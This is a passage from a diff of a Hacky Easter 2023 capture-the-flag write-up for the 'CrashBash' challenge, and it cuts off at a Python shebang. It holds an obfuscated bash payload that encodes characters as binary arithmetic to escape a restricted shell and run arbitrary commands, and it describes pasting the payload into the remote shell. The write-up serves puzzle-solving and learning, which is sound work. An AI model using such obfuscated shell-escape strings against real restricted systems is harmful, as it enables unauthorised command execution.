atcasanova/hackyeaster2023/CrashBash/README.md

 ${0}<<<{$\'\\$(($((1<<1))#111001))\\$(($((1<<1))#10100000))\\$(($((1<<1))#10100010))\\$(($((1<<1))#10010111))\\$(($((1<<1))#10011100))\\$(($((1<<1))#10100100))\\$(($((1<<1))#10010010))\\$(($((1<<1))#10011010))\\$(($((1<<1))#10001101))\\$(($((1<<1))#10010011))\\$(($((1<<1))#111000))\\$(($((1<<1))#10100011))\\$(($((1<<1))#10010110))\',$\'\\$(($((1<<1))#1100110))\\$(($((1<<1))#1000000))\\$(($((1<<1))#10100011))\\$(($((1<<1))#10010110))\\$(($((1<<1))#10001001))\\$(($((1<<1))#10001110))\\$(($((1<<1))#10100010))\\$(($((1<<1))#111100))\\$(($((1<<1))#1111100))\\$(($((1<<1))#1101110))\\$(($((1<<1))#111111))\\$(($((1<<1))#10100010))\\$(($((1<<1))#10100011))\',}
 ```

-then i just had to get the flag:
+Just copy and paste it into the remote shell:

 <img width="726" alt="image" src="https://user-images.githubusercontent.com/2973929/234142293-7f6fe5fd-d15c-402e-b088-2e1852c219fc.png">

 ## Solution 2

 I mean...
-I was happy that I had solved that challenge, but I spent the next days thinking my solution was overkill.
-As I ended up having a way to run any command I wanted, I could, for example, read the code for the limited shell:
+I was happy that I had solved the challenge, but in the following days, I couldn't help but think that my solution was overkill.
+Since I had found a way to execute any command I wanted, I was able to, for example, read the code for the limited shell:

 ```python
 #!/bin/usr/env python3